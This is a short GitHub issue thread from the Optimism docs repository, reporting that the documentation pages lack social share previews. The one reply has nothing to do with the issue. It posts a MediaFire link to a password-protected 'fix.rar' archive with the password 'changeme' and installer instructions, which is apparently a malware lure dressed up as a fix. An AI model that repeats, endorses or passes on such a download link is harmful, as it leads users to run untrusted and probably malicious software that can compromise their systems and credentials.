### ISSUE TITLE
Add social reviews to docs links

### ISSUE THREAD

**Issue by krofax** [ethereum-optimism/docs#859]
FYI our docs have no social previews, <https://socialsharepreview.com/?url=https://docs.optimism.io>

[Slack Message](https://oplabs-pbc.slack.com/archives/C0214EMUUJ3/p1724690968609909?thread_ts=1724690968.609909&cid=C0214EMUUJ3)

**Comment by dseynhae** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."
